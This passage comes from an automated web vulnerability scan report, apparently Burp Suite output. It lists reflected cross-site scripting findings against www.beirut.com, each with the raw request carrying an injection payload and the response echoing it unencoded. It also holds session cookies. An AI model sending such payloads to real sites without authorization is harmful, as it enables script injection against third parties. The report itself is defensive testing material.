Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsf16db"><a>3891791e285">
...[SNIP]...

4.662. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97642'-alert(1)-'cd90dd512a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations97642'-alert(1)-'cd90dd512a0/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:25:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Recreations97642'-alert(1)-'cd90dd512a0/Amusement-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.663. http://www.beirut.com/Recreations/Amusement-Centers/478536232 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Amusement-Centers/478536232

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae02e'-alert(1)-'6d725f33c61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Amusement-Centersae02e'-alert(1)-'6d725f33c61/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Amusement-Centersae02e'-alert(1)-'6d725f33c61';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.664. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c4f'-alert(1)-'098af3f6f88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations65c4f'-alert(1)-'098af3f6f88/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations65c4f'-alert(1)-'098af3f6f88/Arcade-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.665. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff0f"><a>4cc49876d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsdff0f"><a>4cc49876d95/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsdff0f"><a>4cc49876d95">
...[SNIP]...

4.666. http://www.beirut.com/Recreations/Arcade-Centers/707176335 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Arcade-Centers/707176335

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c61a'-alert(1)-'8c9896bc0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Arcade-Centers2c61a'-alert(1)-'8c9896bc0d/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Arcade-Centers2c61a'-alert(1)-'8c9896bc0d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.667. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ba0"><a>b953a310f94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations79ba0"><a>b953a310f94/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:22:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations79ba0"><a>b953a310f94">
...[SNIP]...

4.668. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ffd6'-alert(1)-'fe7d3cb1e0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations4ffd6'-alert(1)-'fe7d3cb1e0b/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations4ffd6'-alert(1)-'fe7d3cb1e0b/Beach-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.669. http://www.beirut.com/Recreations/Beach-Clubs/67326046 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Beach-Clubs/67326046

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52d9'-alert(1)-'ed5bdbff3f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Beach-Clubsd52d9'-alert(1)-'ed5bdbff3f6/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Beach-Clubsd52d9'-alert(1)-'ed5bdbff3f6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.670. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7279d'-alert(1)-'e9af28b17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations7279d'-alert(1)-'e9af28b17/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations7279d'-alert(1)-'e9af28b17/Bowling-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.671. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4478d"><a>78f68414b5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations4478d"><a>78f68414b5a/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:14:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations4478d"><a>78f68414b5a">
...[SNIP]...

4.672. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94851'-alert(1)-'3f9f1762b71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreations/Bowling-Centers94851'-alert(1)-'3f9f1762b71/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:27:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Bowling-Centers94851'-alert(1)-'3f9f1762b71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.673. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7745'-alert(1)-'58f981d477 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Recreationsa7745'-alert(1)-'58f981d477/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreationsa7745'-alert(1)-'58f981d477/Golf-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.674. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b1e"><a>b28c59e248f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsf1b1e"><a>b28c59e248f/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
